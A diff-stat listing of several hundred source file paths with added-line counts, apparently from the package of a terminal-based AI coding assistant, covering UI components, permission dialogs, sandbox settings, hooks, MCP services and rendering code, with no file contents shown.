- package/src/components/messages/UserLocalCommandOutputMessage.tsx +167 -0
- package/src/components/messages/UserMemoryInputMessage.tsx +75 -0
- package/src/components/messages/UserPlanMessage.tsx +42 -0
- package/src/components/messages/UserPromptMessage.tsx +80 -0
- package/src/components/messages/UserResourceUpdateMessage.tsx +121 -0
- package/src/components/messages/UserTeammateMessage.tsx +206 -0
- package/src/components/messages/UserTextMessage.tsx +275 -0
- package/src/components/messages/UserToolResultMessage/RejectedPlanMessage.tsx +31 -0
- package/src/components/messages/UserToolResultMessage/RejectedToolUseMessage.tsx +16 -0
- package/src/components/messages/UserToolResultMessage/UserToolCanceledMessage.tsx +16 -0
- package/src/components/messages/UserToolResultMessage/UserToolErrorMessage.tsx +103 -0
- package/src/components/messages/UserToolResultMessage/UserToolRejectMessage.tsx +95 -0
- package/src/components/messages/UserToolResultMessage/UserToolResultMessage.tsx +106 -0
- package/src/components/messages/UserToolResultMessage/UserToolSuccessMessage.tsx +104 -0
- package/src/components/messages/UserToolResultMessage/utils.tsx +44 -0
- package/src/components/messages/nullRenderingAttachments.ts +70 -0
- package/src/components/messages/teamMemCollapsed.tsx +140 -0
- package/src/components/messages/teamMemSaved.ts +19 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/AskUserQuestionPermissionRequest.tsx +645 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewBox.tsx +229 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewQuestionView.tsx +328 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionNavigationBar.tsx +178 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionView.tsx +465 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/SubmitQuestionsView.tsx +144 -0
- package/src/components/permissions/AskUserQuestionPermissionRequest/use-multiple-choice-state.ts +179 -0
- package/src/components/permissions/BashPermissionRequest/BashPermissionRequest.tsx +482 -0
- package/src/components/permissions/BashPermissionRequest/bashToolUseOptions.tsx +147 -0
- package/src/components/permissions/ComputerUseApproval/ComputerUseApproval.tsx +441 -0
- package/src/components/permissions/EnterPlanModePermissionRequest/EnterPlanModePermissionRequest.tsx +122 -0
- package/src/components/permissions/ExitPlanModePermissionRequest/ExitPlanModePermissionRequest.tsx +768 -0
- package/src/components/permissions/FallbackPermissionRequest.tsx +333 -0
- package/src/components/permissions/FileEditPermissionRequest/FileEditPermissionRequest.tsx +182 -0
- package/src/components/permissions/FilePermissionDialog/FilePermissionDialog.tsx +204 -0
- package/src/components/permissions/FilePermissionDialog/ideDiffConfig.ts +42 -0
- package/src/components/permissions/FilePermissionDialog/permissionOptions.tsx +177 -0
- package/src/components/permissions/FilePermissionDialog/useFilePermissionDialog.ts +212 -0
- package/src/components/permissions/FilePermissionDialog/usePermissionHandler.ts +185 -0
- package/src/components/permissions/FileWritePermissionRequest/FileWritePermissionRequest.tsx +161 -0
- package/src/components/permissions/FileWritePermissionRequest/FileWriteToolDiff.tsx +89 -0
- package/src/components/permissions/FilesystemPermissionRequest/FilesystemPermissionRequest.tsx +115 -0
- package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditPermissionRequest.tsx +166 -0
- package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditToolDiff.tsx +235 -0
- package/src/components/permissions/PermissionDecisionDebugInfo.tsx +460 -0
- package/src/components/permissions/PermissionDialog.tsx +72 -0
- package/src/components/permissions/PermissionExplanation.tsx +272 -0
- package/src/components/permissions/PermissionPrompt.tsx +336 -0
- package/src/components/permissions/PermissionRequest.tsx +217 -0
- package/src/components/permissions/PermissionRequestTitle.tsx +66 -0
- package/src/components/permissions/PermissionRuleExplanation.tsx +121 -0
- package/src/components/permissions/PowerShellPermissionRequest/PowerShellPermissionRequest.tsx +235 -0
- package/src/components/permissions/PowerShellPermissionRequest/powershellToolUseOptions.tsx +91 -0
- package/src/components/permissions/SandboxPermissionRequest.tsx +163 -0
- package/src/components/permissions/SedEditPermissionRequest/SedEditPermissionRequest.tsx +230 -0
- package/src/components/permissions/SkillPermissionRequest/SkillPermissionRequest.tsx +369 -0
- package/src/components/permissions/WebFetchPermissionRequest/WebFetchPermissionRequest.tsx +258 -0
- package/src/components/permissions/WorkerBadge.tsx +49 -0
- package/src/components/permissions/WorkerPendingPermission.tsx +105 -0
- package/src/components/permissions/hooks.ts +209 -0
- package/src/components/permissions/rules/AddPermissionRules.tsx +180 -0
- package/src/components/permissions/rules/AddWorkspaceDirectory.tsx +340 -0
- package/src/components/permissions/rules/PermissionRuleDescription.tsx +76 -0
- package/src/components/permissions/rules/PermissionRuleInput.tsx +138 -0
- package/src/components/permissions/rules/PermissionRuleList.tsx +1179 -0
- package/src/components/permissions/rules/RecentDenialsTab.tsx +207 -0
- package/src/components/permissions/rules/RemoveWorkspaceDirectory.tsx +110 -0
- package/src/components/permissions/rules/WorkspaceTab.tsx +150 -0
- package/src/components/permissions/shellPermissionHelpers.tsx +164 -0
- package/src/components/permissions/useShellPermissionFeedback.ts +148 -0
- package/src/components/permissions/utils.ts +25 -0
- package/src/components/sandbox/SandboxConfigTab.tsx +45 -0
- package/src/components/sandbox/SandboxDependenciesTab.tsx +120 -0
- package/src/components/sandbox/SandboxDoctorSection.tsx +46 -0
- package/src/components/sandbox/SandboxOverridesTab.tsx +193 -0
- package/src/components/sandbox/SandboxSettings.tsx +296 -0
- package/src/components/shell/ExpandShellOutputContext.tsx +36 -0
- package/src/components/shell/OutputLine.tsx +118 -0
- package/src/components/shell/ShellProgressMessage.tsx +150 -0
- package/src/components/shell/ShellTimeDisplay.tsx +74 -0
- package/src/components/skills/SkillsMenu.tsx +237 -0
- package/src/components/tasks/AsyncAgentDetailDialog.tsx +229 -0
- package/src/components/tasks/BackgroundTask.tsx +345 -0
- package/src/components/tasks/BackgroundTaskStatus.tsx +429 -0
- package/src/components/tasks/BackgroundTasksDialog.tsx +652 -0
- package/src/components/tasks/DreamDetailDialog.tsx +251 -0
- package/src/components/tasks/InProcessTeammateDetailDialog.tsx +266 -0
- package/src/components/tasks/RemoteSessionDetailDialog.tsx +904 -0
- package/src/components/tasks/RemoteSessionProgress.tsx +243 -0
- package/src/components/tasks/ShellDetailDialog.tsx +404 -0
- package/src/components/tasks/ShellProgress.tsx +87 -0
- package/src/components/tasks/renderToolActivity.tsx +33 -0
- package/src/components/tasks/taskStatusUtils.tsx +107 -0
- package/src/components/teams/TeamStatus.tsx +80 -0
- package/src/components/teams/TeamsDialog.tsx +715 -0
- package/src/components/ui/OrderedList.tsx +71 -0
- package/src/components/ui/OrderedListItem.tsx +45 -0
- package/src/components/ui/TreeSelect.tsx +397 -0
- package/src/components/wizard/WizardDialogLayout.tsx +65 -0
- package/src/components/wizard/WizardNavigationFooter.tsx +24 -0
- package/src/components/wizard/WizardProvider.tsx +213 -0
- package/src/components/wizard/index.ts +9 -0
- package/src/components/wizard/useWizard.ts +13 -0
- package/src/constants/apiLimits.ts +94 -0
- package/src/constants/betas.ts +52 -0
- package/src/constants/common.ts +33 -0
- package/src/constants/cyberRiskInstruction.ts +24 -0
- package/src/constants/errorIds.ts +15 -0
- package/src/constants/figures.ts +45 -0
- package/src/constants/files.ts +156 -0
- package/src/constants/github-app.ts +144 -0
- package/src/constants/keys.ts +11 -0
- package/src/constants/messages.ts +1 -0
- package/src/constants/oauth.ts +234 -0
- package/src/constants/outputStyles.ts +216 -0
- package/src/constants/product.ts +76 -0
- package/src/constants/prompts.ts +914 -0
- package/src/constants/spinnerVerbs.ts +204 -0
- package/src/constants/system.ts +95 -0
- package/src/constants/systemPromptSections.ts +68 -0
- package/src/constants/toolLimits.ts +56 -0
- package/src/constants/tools.ts +112 -0
- package/src/constants/turnCompletionVerbs.ts +12 -0
- package/src/constants/xml.ts +86 -0
- package/src/context/QueuedMessageContext.tsx +63 -0
- package/src/context/fpsMetrics.tsx +30 -0
- package/src/context/mailbox.tsx +38 -0
- package/src/context/modalContext.tsx +58 -0
- package/src/context/notifications.tsx +240 -0
- package/src/context/overlayContext.tsx +151 -0
- package/src/context/promptOverlayContext.tsx +125 -0
- package/src/context/stats.tsx +220 -0
- package/src/context/voice.tsx +88 -0
- package/src/context.ts +189 -0
- package/src/coordinator/coordinatorMode.ts +369 -0
- package/src/cost-tracker.ts +323 -0
- package/src/costHook.ts +22 -0
- package/src/dialogLaunchers.tsx +133 -0
- package/src/entrypoints/agentSdkTypes.ts +443 -0
- package/src/entrypoints/cli.tsx +303 -0
- package/src/entrypoints/init.ts +340 -0
- package/src/entrypoints/mcp.ts +196 -0
- package/src/entrypoints/sandboxTypes.ts +156 -0
- package/src/entrypoints/sdk/controlSchemas.ts +663 -0
- package/src/entrypoints/sdk/coreSchemas.ts +1889 -0
- package/src/entrypoints/sdk/coreTypes.ts +62 -0
- package/src/history.ts +464 -0
- package/src/hooks/fileSuggestions.ts +811 -0
- package/src/hooks/notifs/useAutoModeUnavailableNotification.ts +56 -0
- package/src/hooks/notifs/useCanSwitchToExistingSubscription.tsx +60 -0
- package/src/hooks/notifs/useDeprecationWarningNotification.tsx +44 -0
- package/src/hooks/notifs/useFastModeNotification.tsx +162 -0
- package/src/hooks/notifs/useIDEStatusIndicator.tsx +186 -0
- package/src/hooks/notifs/useInstallMessages.tsx +26 -0
- package/src/hooks/notifs/useLspInitializationNotification.tsx +143 -0
- package/src/hooks/notifs/useMcpConnectivityStatus.tsx +88 -0
- package/src/hooks/notifs/useModelMigrationNotifications.tsx +52 -0
- package/src/hooks/notifs/useNpmDeprecationNotification.tsx +25 -0
- package/src/hooks/notifs/usePluginAutoupdateNotification.tsx +83 -0
- package/src/hooks/notifs/usePluginInstallationStatus.tsx +128 -0
- package/src/hooks/notifs/useRateLimitWarningNotification.tsx +114 -0
- package/src/hooks/notifs/useSettingsErrors.tsx +69 -0
- package/src/hooks/notifs/useStartupNotification.ts +41 -0
- package/src/hooks/notifs/useTeammateShutdownNotification.ts +78 -0
- package/src/hooks/renderPlaceholder.ts +51 -0
- package/src/hooks/toolPermission/PermissionContext.ts +388 -0
- package/src/hooks/toolPermission/handlers/coordinatorHandler.ts +65 -0
- package/src/hooks/toolPermission/handlers/interactiveHandler.ts +536 -0
- package/src/hooks/toolPermission/handlers/swarmWorkerHandler.ts +159 -0
- package/src/hooks/toolPermission/permissionLogging.ts +238 -0
- package/src/hooks/unifiedSuggestions.ts +202 -0
- package/src/hooks/useAfterFirstRender.ts +17 -0
- package/src/hooks/useApiKeyVerification.ts +84 -0
- package/src/hooks/useArrowKeyHistory.tsx +229 -0
- package/src/hooks/useAssistantHistory.ts +250 -0
- package/src/hooks/useAwaySummary.ts +125 -0
- package/src/hooks/useBackgroundTaskNavigation.ts +251 -0
- package/src/hooks/useBlink.ts +34 -0
- package/src/hooks/useCanUseTool.tsx +204 -0
- package/src/hooks/useCancelRequest.ts +276 -0
- package/src/hooks/useChromeExtensionNotification.tsx +50 -0
- package/src/hooks/useClaudeCodeHintRecommendation.tsx +129 -0
- package/src/hooks/useClipboardImageHint.ts +77 -0
- package/src/hooks/useCommandKeybindings.tsx +108 -0
- package/src/hooks/useCommandQueue.ts +15 -0
- package/src/hooks/useCopyOnSelect.ts +98 -0
- package/src/hooks/useDeferredHookMessages.ts +46 -0
- package/src/hooks/useDiffData.ts +110 -0
- package/src/hooks/useDiffInIDE.ts +379 -0
- package/src/hooks/useDirectConnect.ts +229 -0
- package/src/hooks/useDoublePress.ts +62 -0
- package/src/hooks/useDynamicConfig.ts +22 -0
- package/src/hooks/useElapsedTime.ts +37 -0
- package/src/hooks/useExitOnCtrlCD.ts +95 -0
- package/src/hooks/useExitOnCtrlCDWithKeybindings.ts +24 -0
- package/src/hooks/useFileHistorySnapshotInit.ts +25 -0
- package/src/hooks/useGlobalKeybindings.tsx +249 -0
- package/src/hooks/useHistorySearch.ts +303 -0
- package/src/hooks/useIDEIntegration.tsx +70 -0
- package/src/hooks/useIdeAtMentioned.ts +76 -0
- package/src/hooks/useIdeConnectionStatus.ts +33 -0
- package/src/hooks/useIdeLogging.ts +41 -0
- package/src/hooks/useIdeSelection.ts +150 -0
- package/src/hooks/useInboxPoller.ts +969 -0
- package/src/hooks/useInputBuffer.ts +132 -0
- package/src/hooks/useIssueFlagBanner.ts +133 -0
- package/src/hooks/useLogMessages.ts +119 -0
- package/src/hooks/useLspPluginRecommendation.tsx +194 -0
- package/src/hooks/useMailboxBridge.ts +21 -0
- package/src/hooks/useMainLoopModel.ts +34 -0
- package/src/hooks/useManagePlugins.ts +304 -0
- package/src/hooks/useMemoryUsage.ts +39 -0
- package/src/hooks/useMergedClients.ts +23 -0
- package/src/hooks/useMergedCommands.ts +15 -0
- package/src/hooks/useMergedTools.ts +44 -0
- package/src/hooks/useMinDisplayTime.ts +35 -0
- package/src/hooks/useNotifyAfterTimeout.ts +65 -0
- package/src/hooks/useOfficialMarketplaceNotification.tsx +48 -0
- package/src/hooks/usePasteHandler.ts +285 -0
- package/src/hooks/usePluginRecommendationBase.tsx +105 -0
- package/src/hooks/usePrStatus.ts +106 -0
- package/src/hooks/usePromptSuggestion.ts +177 -0
- package/src/hooks/usePromptsFromClaudeInChrome.tsx +71 -0
- package/src/hooks/useQueueProcessor.ts +68 -0
- package/src/hooks/useRemoteSession.ts +605 -0
- package/src/hooks/useReplBridge.tsx +723 -0
- package/src/hooks/useSSHSession.ts +241 -0
- package/src/hooks/useScheduledTasks.ts +139 -0
- package/src/hooks/useSearchInput.ts +364 -0
- package/src/hooks/useSessionBackgrounding.ts +158 -0
- package/src/hooks/useSettings.ts +17 -0
- package/src/hooks/useSettingsChange.ts +25 -0
- package/src/hooks/useSkillImprovementSurvey.ts +105 -0
- package/src/hooks/useSkillsChange.ts +62 -0
- package/src/hooks/useSwarmInitialization.ts +81 -0
- package/src/hooks/useSwarmPermissionPoller.ts +330 -0
- package/src/hooks/useTaskListWatcher.ts +221 -0
- package/src/hooks/useTasksV2.ts +250 -0
- package/src/hooks/useTeammateViewAutoExit.ts +63 -0
- package/src/hooks/useTeleportResume.tsx +85 -0
- package/src/hooks/useTerminalSize.ts +15 -0
- package/src/hooks/useTextInput.ts +529 -0
- package/src/hooks/useTimeout.ts +14 -0
- package/src/hooks/useTurnDiffs.ts +213 -0
- package/src/hooks/useTypeahead.tsx +1385 -0
- package/src/hooks/useUpdateNotification.ts +34 -0
- package/src/hooks/useVimInput.ts +316 -0
- package/src/hooks/useVirtualScroll.ts +721 -0
- package/src/hooks/useVoice.ts +1144 -0
- package/src/hooks/useVoiceEnabled.ts +25 -0
- package/src/hooks/useVoiceIntegration.tsx +677 -0
- package/src/ink/Ansi.tsx +292 -0
- package/src/ink/bidi.ts +139 -0
- package/src/ink/clearTerminal.ts +74 -0
- package/src/ink/colorize.ts +231 -0
- package/src/ink/components/AlternateScreen.tsx +80 -0
- package/src/ink/components/App.tsx +659 -0
- package/src/ink/components/AppContext.ts +21 -0
- package/src/ink/components/Box.tsx +214 -0
- package/src/ink/components/Button.tsx +192 -0
- package/src/ink/components/ClockContext.tsx +112 -0
- package/src/ink/components/CursorDeclarationContext.ts +32 -0
- package/src/ink/components/ErrorOverview.tsx +109 -0
- package/src/ink/components/Link.tsx +42 -0
- package/src/ink/components/Newline.tsx +39 -0
- package/src/ink/components/NoSelect.tsx +68 -0
- package/src/ink/components/RawAnsi.tsx +57 -0
- package/src/ink/components/ScrollBox.tsx +237 -0
- package/src/ink/components/Spacer.tsx +20 -0
- package/src/ink/components/StdinContext.ts +49 -0
- package/src/ink/components/TerminalFocusContext.tsx +52 -0
- package/src/ink/components/TerminalSizeContext.tsx +7 -0
- package/src/ink/components/Text.tsx +254 -0
- package/src/ink/constants.ts +2 -0
- package/src/ink/dom.ts +484 -0
- package/src/ink/events/click-event.ts +38 -0
- package/src/ink/events/dispatcher.ts +233 -0
- package/src/ink/events/emitter.ts +39 -0
- package/src/ink/events/event-handlers.ts +73 -0
- package/src/ink/events/event.ts +11 -0
- package/src/ink/events/focus-event.ts +21 -0
- package/src/ink/events/input-event.ts +205 -0
- package/src/ink/events/keyboard-event.ts +51 -0
- package/src/ink/events/terminal-event.ts +107 -0
- package/src/ink/events/terminal-focus-event.ts +19 -0
- package/src/ink/focus.ts +181 -0
- package/src/ink/frame.ts +124 -0
- package/src/ink/get-max-width.ts +27 -0
- package/src/ink/hit-test.ts +130 -0
- package/src/ink/hooks/use-animation-frame.ts +57 -0
- package/src/ink/hooks/use-app.ts +8 -0
- package/src/ink/hooks/use-declared-cursor.ts +73 -0
- package/src/ink/hooks/use-input.ts +92 -0
- package/src/ink/hooks/use-interval.ts +67 -0
- package/src/ink/hooks/use-search-highlight.ts +53 -0
- package/src/ink/hooks/use-selection.ts +104 -0
- package/src/ink/hooks/use-stdin.ts +8 -0
- package/src/ink/hooks/use-tab-status.ts +72 -0
- package/src/ink/hooks/use-terminal-focus.ts +16 -0
- package/src/ink/hooks/use-terminal-title.ts +31 -0
- package/src/ink/hooks/use-terminal-viewport.ts +96 -0
- package/src/ink/ink.tsx +1728 -0
- package/src/ink/instances.ts +10 -0
- package/src/ink/layout/engine.ts +6 -0
- package/src/ink/layout/geometry.ts +97 -0
- package/src/ink/layout/node.ts +152 -0
- package/src/ink/layout/yoga.ts +308 -0
- package/src/ink/line-width-cache.ts +24 -0
- package/src/ink/log-update.ts +773 -0
- package/src/ink/measure-element.ts +23 -0
- package/src/ink/measure-text.ts +47 -0
- package/src/ink/node-cache.ts +54 -0
- package/src/ink/optimizer.ts +93 -0
- package/src/ink/output.ts +797 -0
- package/src/ink/parse-keypress.ts +801 -0
- package/src/ink/reconciler.ts +512 -0
- package/src/ink/render-border.ts +231 -0
- package/src/ink/render-node-to-output.ts +1462 -0
- package/src/ink/render-to-screen.ts +231 -0
- package/src/ink/renderer.ts +178 -0
- package/src/ink/root.ts +184 -0
- package/src/ink/screen.ts +1486 -0
- package/src/ink/searchHighlight.ts +93 -0
- package/src/ink/selection.ts +917 -0
- package/src/ink/squash-text-nodes.ts +92 -0
- package/src/ink/stringWidth.ts +222 -0
- package/src/ink/styles.ts +771 -0
- package/src/ink/supports-hyperlinks.ts +57 -0
- package/src/ink/tabstops.ts +46 -0
- package/src/ink/terminal-focus-state.ts +47 -0
- package/src/ink/terminal-querier.ts +212 -0
- package/src/ink/terminal.ts +248 -0
- package/src/ink/termio/ansi.ts +75 -0
- package/src/ink/termio/csi.ts +319 -0
- package/src/ink/termio/dec.ts +60 -0
- package/src/ink/termio/esc.ts +67 -0
- package/src/ink/termio/osc.ts +493 -0
- package/src/ink/termio/parser.ts +394 -0
- package/src/ink/termio/sgr.ts +308 -0
- package/src/ink/termio/tokenize.ts +319 -0
- package/src/ink/termio/types.ts +236 -0
- package/src/ink/termio.ts +42 -0
- package/src/ink/useTerminalNotification.ts +126 -0
- package/src/ink/warn.ts +9 -0
- package/src/ink/widest-line.ts +19 -0
- package/src/ink/wrap-text.ts +74 -0
- package/src/ink/wrapAnsi.ts +20 -0
- package/src/ink.ts +85 -0
- package/src/interactiveHelpers.tsx +367 -0
- package/src/keybindings/KeybindingContext.tsx +243 -0
- package/src/keybindings/KeybindingProviderSetup.tsx +308 -0
- package/src/keybindings/defaultBindings.ts +340 -0
- package/src/keybindings/loadUserBindings.ts +472 -0
- package/src/keybindings/match.ts +120 -0
- package/src/keybindings/parser.ts +203 -0
- package/src/keybindings/reservedShortcuts.ts +127 -0
- package/src/keybindings/resolver.ts +244 -0
- package/src/keybindings/schema.ts +236 -0
- package/src/keybindings/shortcutFormat.ts +63 -0
- package/src/keybindings/template.ts +52 -0
- package/src/keybindings/useKeybinding.ts +196 -0
- package/src/keybindings/useShortcutDisplay.ts +59 -0
- package/src/keybindings/validate.ts +498 -0
- package/src/main.tsx +4684 -0
- package/src/memdir/findRelevantMemories.ts +141 -0
- package/src/memdir/memdir.ts +507 -0
- package/src/memdir/memoryAge.ts +53 -0
- package/src/memdir/memoryScan.ts +94 -0
- package/src/memdir/memoryTypes.ts +271 -0
- package/src/memdir/paths.ts +278 -0
- package/src/memdir/teamMemPaths.ts +292 -0
- package/src/memdir/teamMemPrompts.ts +100 -0
- package/src/migrations/migrateAutoUpdatesToSettings.ts +61 -0
- package/src/migrations/migrateBypassPermissionsAcceptedToSettings.ts +40 -0
- package/src/migrations/migrateEnableAllProjectMcpServersToSettings.ts +118 -0
- package/src/migrations/migrateFennecToOpus.ts +45 -0
- package/src/migrations/migrateLegacyOpusToCurrent.ts +57 -0
- package/src/migrations/migrateOpusToOpus1m.ts +43 -0
- package/src/migrations/migrateReplBridgeEnabledToRemoteControlAtStartup.ts +22 -0
- package/src/migrations/migrateSonnet1mToSonnet45.ts +48 -0
- package/src/migrations/migrateSonnet45ToSonnet46.ts +67 -0
- package/src/migrations/resetAutoModeOptInForDefaultOffer.ts +51 -0
- package/src/migrations/resetProToOpusDefault.ts +51 -0
- package/src/moreright/useMoreRight.tsx +26 -0
- package/src/native-ts/color-diff/index.ts +999 -0
- package/src/native-ts/file-index/index.ts +370 -0
- package/src/native-ts/yoga-layout/enums.ts +134 -0
- package/src/native-ts/yoga-layout/index.ts +2578 -0
- package/src/outputStyles/loadOutputStylesDir.ts +98 -0
- package/src/plugins/builtinPlugins.ts +159 -0
- package/src/plugins/bundled/index.ts +23 -0
- package/src/projectOnboardingState.ts +83 -0
- package/src/query/config.ts +46 -0
- package/src/query/deps.ts +40 -0
- package/src/query/stopHooks.ts +473 -0
- package/src/query/tokenBudget.ts +93 -0
- package/src/query.ts +1729 -0
- package/src/remote/RemoteSessionManager.ts +343 -0
- package/src/remote/SessionsWebSocket.ts +404 -0
- package/src/remote/remotePermissionBridge.ts +78 -0
- package/src/remote/sdkMessageAdapter.ts +302 -0
- package/src/replLauncher.tsx +23 -0
- package/src/schemas/hooks.ts +222 -0
- package/src/screens/Doctor.tsx +575 -0
- package/src/screens/REPL.tsx +5006 -0
- package/src/screens/ResumeConversation.tsx +399 -0
- package/src/server/createDirectConnectSession.ts +88 -0
- package/src/server/directConnectManager.ts +213 -0
- package/src/server/types.ts +57 -0
- package/src/services/AgentSummary/agentSummary.ts +179 -0
- package/src/services/MagicDocs/magicDocs.ts +254 -0
- package/src/services/MagicDocs/prompts.ts +127 -0
- package/src/services/PromptSuggestion/promptSuggestion.ts +523 -0
- package/src/services/PromptSuggestion/speculation.ts +991 -0
- package/src/services/SessionMemory/prompts.ts +324 -0
- package/src/services/SessionMemory/sessionMemory.ts +495 -0
- package/src/services/SessionMemory/sessionMemoryUtils.ts +207 -0
- package/src/services/analytics/config.ts +38 -0
- package/src/services/analytics/datadog.ts +307 -0
- package/src/services/analytics/firstPartyEventLogger.ts +449 -0
- package/src/services/analytics/firstPartyEventLoggingExporter.ts +806 -0
- package/src/services/analytics/growthbook.ts +1157 -0
- package/src/services/analytics/index.ts +173 -0
- package/src/services/analytics/metadata.ts +973 -0
- package/src/services/analytics/sink.ts +114 -0
- package/src/services/analytics/sinkKillswitch.ts +25 -0
- package/src/services/api/adminRequests.ts +119 -0
- package/src/services/api/bootstrap.ts +142 -0
- package/src/services/api/claude.ts +3433 -0
- package/src/services/api/client.ts +395 -0
- package/src/services/api/dumpPrompts.ts +226 -0
- package/src/services/api/emptyUsage.ts +22 -0
- package/src/services/api/errorUtils.ts +260 -0
- package/src/services/api/errors.ts +1207 -0
- package/src/services/api/filesApi.ts +748 -0
- package/src/services/api/firstTokenDate.ts +60 -0
- package/src/services/api/grove.ts +357 -0
- package/src/services/api/logging.ts +788 -0
- package/src/services/api/metricsOptOut.ts +159 -0
- package/src/services/api/overageCreditGrant.ts +137 -0
- package/src/services/api/promptCacheBreakDetection.ts +727 -0
- package/src/services/api/referral.ts +281 -0
- package/src/services/api/sessionIngress.ts +514 -0
- package/src/services/api/ultrareviewQuota.ts +38 -0
- package/src/services/api/usage.ts +63 -0
- package/src/services/api/withRetry.ts +826 -0
- package/src/services/autoDream/autoDream.ts +324 -0
- package/src/services/autoDream/config.ts +21 -0
- package/src/services/autoDream/consolidationLock.ts +140 -0
- package/src/services/autoDream/consolidationPrompt.ts +65 -0
- package/src/services/awaySummary.ts +74 -0
- package/src/services/claudeAiLimits.ts +515 -0
- package/src/services/claudeAiLimitsHook.ts +23 -0
- package/src/services/compact/apiMicrocompact.ts +153 -0
- package/src/services/compact/autoCompact.ts +351 -0
- package/src/services/compact/compact.ts +1705 -0
- package/src/services/compact/compactWarningHook.ts +16 -0
- package/src/services/compact/compactWarningState.ts +18 -0
- package/src/services/compact/grouping.ts +63 -0
- package/src/services/compact/microCompact.ts +530 -0
- package/src/services/compact/postCompactCleanup.ts +77 -0
- package/src/services/compact/prompt.ts +374 -0
- package/src/services/compact/sessionMemoryCompact.ts +630 -0
- package/src/services/compact/timeBasedMCConfig.ts +43 -0
- package/src/services/diagnosticTracking.ts +397 -0
- package/src/services/extractMemories/extractMemories.ts +615 -0
- package/src/services/extractMemories/prompts.ts +154 -0
- package/src/services/internalLogging.ts +90 -0
- package/src/services/lsp/LSPClient.ts +447 -0
- package/src/services/lsp/LSPDiagnosticRegistry.ts +386 -0
- package/src/services/lsp/LSPServerInstance.ts +511 -0
- package/src/services/lsp/LSPServerManager.ts +420 -0
- package/src/services/lsp/config.ts +79 -0
- package/src/services/lsp/manager.ts +289 -0
- package/src/services/lsp/passiveFeedback.ts +328 -0
- package/src/services/mcp/InProcessTransport.ts +63 -0
- package/src/services/mcp/MCPConnectionManager.tsx +73 -0
- package/src/services/mcp/SdkControlTransport.ts +136 -0
- package/src/services/mcp/auth.ts +2465 -0
- package/src/services/mcp/channelAllowlist.ts +76 -0
- package/src/services/mcp/channelNotification.ts +316 -0
- package/src/services/mcp/channelPermissions.ts +240 -0
- package/src/services/mcp/claudeai.ts +164 -0
- package/src/services/mcp/client.ts +3348 -0
- package/src/services/mcp/config.ts +1578 -0
- package/src/services/mcp/elicitationHandler.ts +313 -0
- package/src/services/mcp/envExpansion.ts +38 -0
- package/src/services/mcp/headersHelper.ts +138 -0
- package/src/services/mcp/mcpStringUtils.ts +106 -0
- package/src/services/mcp/normalization.ts +23 -0
- package/src/services/mcp/oauthPort.ts +78 -0
- package/src/services/mcp/officialRegistry.ts +72 -0
- package/src/services/mcp/types.ts +258 -0
- package/src/services/mcp/useManageMCPConnections.ts +1141 -0
- package/src/services/mcp/utils.ts +575 -0
- package/src/services/mcp/vscodeSdkMcp.ts +112 -0
- package/src/services/mcp/xaa.ts +511 -0
- package/src/services/mcp/xaaIdpLogin.ts +487 -0
- package/src/services/mcpServerApproval.tsx +41 -0
- package/src/services/mockRateLimits.ts +882 -0
- package/src/services/notifier.ts +156 -0
- package/src/services/oauth/auth-code-listener.ts +211 -0
- package/src/services/oauth/client.ts +566 -0
- package/src/services/oauth/crypto.ts +23 -0
- package/src/services/oauth/getOauthProfile.ts +53 -0
- package/src/services/oauth/index.ts +198 -0
- package/src/services/plugins/PluginInstallationManager.ts +184 -0
- package/src/services/plugins/pluginCliCommands.ts +344 -0
- package/src/services/plugins/pluginOperations.ts +1088 -0
- package/src/services/policyLimits/index.ts +664 -0
- package/src/services/policyLimits/types.ts +27 -0
- package/src/services/preventSleep.ts +165 -0
- package/src/services/rateLimitMessages.ts +344 -0
- package/src/services/rateLimitMocking.ts +144 -0
- package/src/services/remoteManagedSettings/index.ts +639 -0
- package/src/services/remoteManagedSettings/securityCheck.tsx +74 -0
- package/src/services/remoteManagedSettings/syncCache.ts +112 -0
- package/src/services/remoteManagedSettings/syncCacheState.ts +96 -0
- package/src/services/remoteManagedSettings/types.ts +31 -0
- package/src/services/settingsSync/index.ts +581 -0
- package/src/services/settingsSync/types.ts +67 -0
- package/src/services/teamMemorySync/index.ts +1256 -0
- package/src/services/teamMemorySync/secretScanner.ts +324 -0
- package/src/services/teamMemorySync/teamMemSecretGuard.ts +44 -0
- package/src/services/teamMemorySync/types.ts +156 -0
- package/src/services/teamMemorySync/watcher.ts +387 -0
- package/src/services/tips/tipHistory.ts +17 -0
- package/src/services/tips/tipRegistry.ts +686 -0
- package/src/services/tips/tipScheduler.ts +58 -0
- package/src/services/tokenEstimation.ts +495 -0
- package/src/services/toolUseSummary/toolUseSummaryGenerator.ts +112 -0
- package/src/services/tools/StreamingToolExecutor.ts +530 -0
- package/src/services/tools/toolExecution.ts +1745 -0
- package/src/services/tools/toolHooks.ts +650 -0
- package/src/services/tools/toolOrchestration.ts +188 -0
- package/src/services/vcr.ts +406 -0
- package/src/services/voice.ts +525 -0
- package/src/services/voiceKeyterms.ts +106 -0
- package/src/services/voiceStreamSTT.ts +544 -0
- package/src/setup.ts +477 -0
- package/src/skills/bundled/batch.ts +124 -0
- package/src/skills/bundled/claudeApi.ts +196 -0
- package/src/skills/bundled/claudeApiContent.ts +75 -0
- package/src/skills/bundled/claudeInChrome.ts +34 -0
- package/src/skills/bundled/debug.ts +103 -0
- package/src/skills/bundled/index.ts +79 -0
- package/src/skills/bundled/keybindings.ts +339 -0
- package/src/skills/bundled/loop.ts +92 -0
- package/src/skills/bundled/loremIpsum.ts +282 -0
- package/src/skills/bundled/remember.ts +82 -0
- package/src/skills/bundled/scheduleRemoteAgents.ts +447 -0
- package/src/skills/bundled/simplify.ts +69 -0
- package/src/skills/bundled/skillify.ts +197 -0
- package/src/skills/bundled/stuck.ts +79 -0
- package/src/skills/bundled/updateConfig.ts +475 -0
- package/src/skills/bundled/verify.ts +30 -0
- package/src/skills/bundled/verifyContent.ts +13 -0
- package/src/skills/bundledSkills.ts +220 -0
- package/src/skills/loadSkillsDir.ts +1086 -0
- package/src/skills/mcpSkillBuilders.ts +44 -0
- package/src/state/AppState.tsx +200 -0
- package/src/state/AppStateStore.ts +569 -0
- package/src/state/onChangeAppState.ts +171 -0
